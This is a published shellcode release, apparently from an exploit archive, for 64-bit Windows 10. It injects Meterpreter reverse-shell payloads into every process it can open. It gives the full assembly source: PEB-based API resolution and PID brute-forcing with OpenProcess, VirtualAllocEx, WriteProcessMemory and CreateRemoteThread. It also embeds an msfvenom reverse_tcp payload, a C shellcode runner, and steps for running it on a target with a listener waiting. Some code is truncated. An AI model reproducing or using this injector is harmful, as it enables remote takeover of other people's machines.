Windows/x64 Inject All Processes With Meterpreter Reverse Shell Shellcode

655 bytes small 64-bit Windows 10 shellcode that injects all processes with Meterpreter reverse shells.

MD5 | 75a126bd35170b68365261ae4f904c66

# Shellcode Title:  Windows/x64 - Inject All Processes with Meterpreter Reverse Shell (655 Bytes)
# Shellcode Author: Bobby Cooke (boku)
# Date: May 1st, 2021
# Tested on: Windows 10 v2004 (x64)
# Compiled from: Kali Linux (x86_64)
# Shellcode Description:
# 64bit Windows 10 shellcode that injects all processes with Meterpreter reverse shells. The shellcode first resolves the base address of
# kernel32.dll dynamically in memory via the Intel GS Register & host processes Process Environment Block (PEB). Then resolves the addresses
# for the OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread APIs via kernel32.dll's Export Table.
# Once all API's are resolved the shellcode then attempts to open a handle to other processes using the OpenProcess API via bruteforcing the PIDs.
# When a handle to a remote process is returned, the shellcode then attempts to allocate writable & executable memory in the remote process using the
# VirtualAllocEx API. If successful, the shellcode will then use the WriteProcessMemory API to write the Meterpreter shellcode into the memory of the
# remote process. To this point, if everything has returned sucessful, then the CreateRemoteThread API will be executed to create a thread in the remote
# process that will run the Meterpreter shell within that remote process. The shellcode then continues to bruteforce through more PIDs to launch more
# Meterpreter shells.

; Compile & get shellcode from Kali:
; nasm -f win64 x64win-InjectAllProcMeterpreterRevSh.asm -o x64win-InjectAllProcMeterpreterRevSh.o
; for i in $(objdump -D x64win-InjectAllProcMeterpreterRevSh.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
; Get kernel32.dll base address
xor rdi, rdi ; RDI = 0x0
mul rdi ; RAX&RDX =0x0
mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
mov r8, rbx ; RBX & R8 = &kernel32.dll

; Get kernel32.dll ExportTable Address
mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
add cx, 0x88ff
shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable

; Get Number of Functions in Kernel32.dll ExportTable
xor r9, r9
mov r9d, [rdx+0x14] ; R9 = Number of Functions Kernel32.dll ExportTable

; Get &AddressTable from Kernel32.dll ExportTable
xor r10, r10
mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
add r10, r8 ; R10 = &AddressTable

; Get &NamePointerTable from Kernel32.dll ExportTable
xor r11, r11
mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)

; Get &OrdinalTable from Kernel32.dll ExportTable
xor r12, r12
mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
add r12, r8 ; R12 = &OrdinalTable

jmp short apis

; Get the address of the API from the Kernel32.dll ExportTable
pop rbx ; save the return address for ret 2 caller after API address is found
pop rcx ; Get the string length counter from stack
xor rax, rax ; Setup Counter for resolving the API Address after finding the name string
mov rdx, rsp ; RDX = Address of API Name String to match on the Stack
push rcx ; push the string length counter to stack
mov rcx, [rsp] ; reset the string length counter from the stack
xor rdi,rdi ; Clear RDI for setting up string name retrieval
mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll
mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string)
repe cmpsb ; Compare strings at RDI & RSI
je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API
inc rax
cmp rax, r9 ; Have we exhausted all APIs in the Export Table?
jne loop

; Find the address of GetProcAddress by using the last value of the Counter
pop rcx ; remove string length counter from top of stack
mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32.<API>
mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber]
add rax, r8 ; RAX = Kernel32.<API> = RVA kernel32.<API> + kernel32.dll BaseAddress
push rbx ; place the return address from the api string call back on the top of the stack
ret ; return to API caller

apis: ; API Names to resolve addresses
; OpenProcess | String length : 11
xor rcx, rcx
add cl, 0xC ; String length for compare string 11(0xB)+NullByte = 0xC
xor rax, rax
add rax, 0x737365FF ; sse,0xFF : 737365FF
shr rax, 0x8 ; sse,0xFF --> 0x00,sse
push rax
mov rax, 0x636f72506e65704f ; corPnepO : 636f72506e65704f
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kerenl32.dll ExportTable
mov r13, rax ; R13 = &OpenProcess

; VirtualAllocEx | String length : 14
xor rcx, rcx
add cl, 0xF ; String length for compare string 14(0xE)+NullByte = 0xF
mov rax, 0x7845636F6C6CFFFF ; xEcoll,0xFFFF : 7845636f6c6cFFFF
shr rax, 0x10 ; xEcoll,0xFFFF --> 0x0000,xEcoll
push rax
mov rax, 0x416c617574726956 ; AlautriV : 416c617574726956
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kerenl32.dll ExportTable
mov r14, rax ; R14 = &VirtualAllocEx

; WriteProcessMemory | String length : 18
xor rcx, rcx
push rcx
add cl, 0x9 ; String length for compare string
mov rax, 0x6f6d654d73736563 ; omeMssec : 6f6d654d73736563
push rax
mov rax, 0x6f72506574697257 ; orPetirW : 6f72506574697257
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kerenl32.dll ExportTable
mov r15, rax ; R15 = &WriteProcessMemory

; CreateRemoteThread | String length : 18
xor rcx, rcx
push rcx
add cl, 0x7 ; String length for compare string
mov rax, 0x6552657461657243 ; eRetaerC : 6552657461657243
push rax
push rcx ; push the string length counter to stack
call getapiaddr ; Get the address of the API from Kerenl32.dll ExportTable
mov r12, rax ; R12 = &CreateRemoteThread

; R11 = Handle Counter | R12 = &CreateRemoteThread | R13 = &OpenProcess | R14 = &VirtualAllocEx | R15 = &WriteProcessMemory
push r12
push r13
push r14
push r15
jmp short loopinit

pop rcx ; pop ret address
pop r11
mov r15, [rsp]
mov r14, [rsp+0x8]
mov r13, [rsp+0x10]
mov r12, [rsp+0x18]
push rcx

xor r11, r11
add r11, 0xFA0 ; PID-1 - Start at PID 4000

inc r11 ; Increment the PID Loop counter by 1 and try to open another handle
push r11

; hProc = OpenProcess(PROCESS_ALL_ACCESS, false, i);
; HANDLE OpenProcess(
; DWORD dwDesiredAccess, => RCX = 0x1FFFFF = PROCESS_ALL_ACCESS
; BOOL bInheritHandle, => RDX = 0x0 = false
; DWORD dwProcessId => R8 = ProcessID (PID of target process to inject too)
; );
sub rsp, 0x40 ; Allocate 0x28 (40) bytes on the stack
xor rcx, rcx
add rcx, 0x1FFFFFFF ; RCX = 0x1FFFFFFF
shr rcx, 0x8 ; RCX = 0x1FFFFFFF --> 0x001FFFFF = PROCESS_ALL_ACCESS
xor rdx, rdx ; RDX = 0x0 = false
xor r8,r8
mov r8, r11 ; R8 = ProcessID (PID of target process to inject too)
call r13 ; RAX will return the Process Handle for the opened remote process
add rsp, 0x40 ; clean up stack
call getAddrFromStack ; reset API addresses in registers
xor rdx, rdx ; RDX = Returned Null? (Could not Open a handle to remote process)
cmp rax, rdx
je hprocloop ; Failed to get a handle to remote process, increment ProcessID by 1 and try again
push r11 ; push counter to stack to avoid clobber
push rax ; Save hProcess handle to stack - R10 & RAX & RCX get clobbered by VirtualAllocEx()

; remoteProcAddr = VirtualAllocEx(hProc, 0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
; LPVOID VirtualAllocEx(
; HANDLE hProcess, => RCX = Process Handle returned from OpenProcess()
; LPVOID lpAddress, => RDX = 0x0 - Will allow kernel to allocate the dest memory addr in remote process
; SIZE_T dwSize, => R8 = 0x1000 - Memory size to allocate
; DWORD flAllocationType, => R9 = 0x3000 => MEM_RESERVE
; DWORD flProtect => [RSP+0x20] = 0x40 => PAGE_EXECUTE_READWRITE - Makes the memory buffer in remote process Read&Write&Executable (Required for DEP)
; );
sub rsp, 0x40 ; Allocate 0x28 (40) bytes on the stack
mov rcx, rax ; RCX = HANDLE hProcess
xor rdx, rdx ; RDX = 0x0 = lpAddress
xor r8, r8
xor rbx, rbx
add bx, 0x10FF
shr rbx, 0x8 ; 0x10FF --> 0x10
shl rbx, 0x8 ; 0x10 --> 0x1000
add r8, rbx ; R8 = dwSize
xor r9, r9
xor rbx, rbx
add bx, 0x30FF
shr rbx, 0x8 ; 0x30FF --> 0x30
shl rbx, 0x8 ; 0x30 --> 0x3000
add r9, rbx ; R9 = flAllocationType
xor rbx, rbx
add bx, 0x40FF
shr rbx, 0x8 ; 0x40FF --> 0x40
mov [rsp+0x20], rbx ; [RSP=0x20] = flProtect
call r14 ; If success, RAX = Address of allocated memory in remote process
add rsp, 0x40 ; clean up stack
pop r10 ; get open handle to remote process from stack
call getAddrFromStack ; reset API addresses in registers
xor rdx, rdx ; RDX = Returned Null? (Could allocate memory in remote process)
cmp rax, rdx
je hprocloop ; Failed to allocate memory in remote process, increment ProcessID by 1 and try again
push r11
push rax ; Save remoteProcAddr to stack
push r10 ; Save hProcess handle to stack - R10 & RAX & RCX get clobbered by VirtualAllocEx()

; n = WriteProcessMemory(hProc, remoteProcAddr, payload, payload_len, NULL);
; BOOL WriteProcessMemory(
; HANDLE hProcess, => RCX = Process Handle returned from OpenProcess()
; LPVOID lpBaseAddress, => RDX = Memory address in remote process returned from VirtualAllocEx()
; LPCVOID lpBuffer, => R8 = Memory address in host process of the shellcode that will be injected into remote process
; SIZE_T nSize, => R9 = 0x1000 - Memory size to allocate
; SIZE_T *lpNumberOfBytesWritten => [RSP+0x20] = 0x0 - Have to place 5th+ values on stack. Need to leave 32 bytes for "Shadow Space" 0x20=32bytes
; );
sub rsp, 0x40 ; Allocate 0x28 (40) bytes on the stack
mov rcx, r10 ; RCX = HANDLE hProcess
mov rdx, rax ; RDX = lpBaseAddress
jmp short callPayload
pop r8 ; r8 = local shellcode payload address
xor rbx, rbx
add bx, 0x10FF
shr rbx, 0x8 ; 0x10FF --> 0x10
shl rbx, 0x8 ; 0x10 --> 0x1000
mov r9, rbx ; R9 = nSize
xor rbx, rbx
mov [rsp+0x20], rbx ; [RSP=0x20] = *lpNumberOfBytesWritten
call r15 ; if success will return True (1) else False (0) = fail
add rsp, 0x40 ; clean up stack
pop r10 ; get Process Handle from stack
pop r9 ; R9 = remoteProcAddr
call getAddrFromStack ; reset API addresses in registers
xor rdx, rdx ; RDX = Returned Null? (Could write memory in remote process)
cmp rax, rdx
je hprocloop ; Failed to write memory in remote process, increment ProcessID by 1 and try again

; CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)remoteProcAddr, NULL, NULL, NULL);
; HANDLE CreateRemoteThread(
; HANDLE hProcess, => RCX = Process Handle returned from OpenProcess()
; LPSECURITY_ATTRIBUTES lpThreadAttributes, => RDX = 0x0
; SIZE_T dwStackSize, => R8 = 0x0
; LPTHREAD_START_ROUTINE lpStartAddress, => R9 = remoteProcAddr
; LPVOID lpParameter, => [RSP+0x20] = 0x0
; DWORD dwCreationFlags, => [RSP+0x28] = 0x0
; LPDWORD lpThreadId => [RSP+0x30] = 0x0
; );
push r11
sub rsp, 0x40 ; Allocate 0x28 (40) bytes on the stack
mov rcx, r10 ; RCX = HANDLE hProcess
xor rdx, rdx ; RDX = lpThreadAttributes
xor r8, r8 ; R8 = dwStackSize
; R9 = remoteProcAddr
mov [rsp+0x20], r8 ; lpParameter
mov [rsp+0x28], r8 ; dwCreationFlag
mov [rsp+0x30], r8 ; lpThreadId
call r12 ; Call CreateRemoteThread()
add rsp, 0x40 ; clean up stack
call getAddrFromStack ; reset API addresses in registers
xor rax,rax
xor rdx,rdx
je hprocloop ; Do the process injection again on more processes

call popPayload
; nopsled
db 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
; msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=1337 EXITFUNC=thread -f csharp
; Payload size: 511 bytes
db 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,\
; nopsled
db 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90


// shellcode-CppRunner.c
// Cross-Compiled from x64 Kali with mingw
// x86_64-w64-mingw32-gcc shellcode-cppRunner.c -o shellcode-cppRunner.exe
// ^ Now transfer the EXE to the target windows host, execute it, and have this shellcode runner do its thing for a demo
// - Make sure to start the multi/handler on your MSFConsole to catch the meterpreter reverse shells
// msfconsole; msf6 > use multi/handler; msf6 > set payload windows/x64/meterpreter/reverse_tcp; msf6 > set lhost; msf6 > set lport 1337; run
// ^ Replace the msfvenom code below, and mod the msfconsole commands to your lhost and lport & mod payload_len var below if your met shell in not == 511 bytes

#include <windows.h>
#include <stdlib.h>

unsigned char scode[] =
// The Process injector shellcode that dynamically resolves the APIs and injects all processes on the target that it can get a handle too
// To inject all processes on the target running this shellcode with your own Meterpreter Reverse shell (with your own IP), use msfvenom and replace below
// msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=1337 EXITFUNC=thread -f c

unsigned int payload_len = 1166;

int main(int argc, char** argv)
DWORD oldprotect = 0;
void* exec = VirtualAlloc(0, payload_len, MEM_COMMIT, PAGE_READWRITE);
memcpy(exec, scode, payload_len);
auto vp = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);

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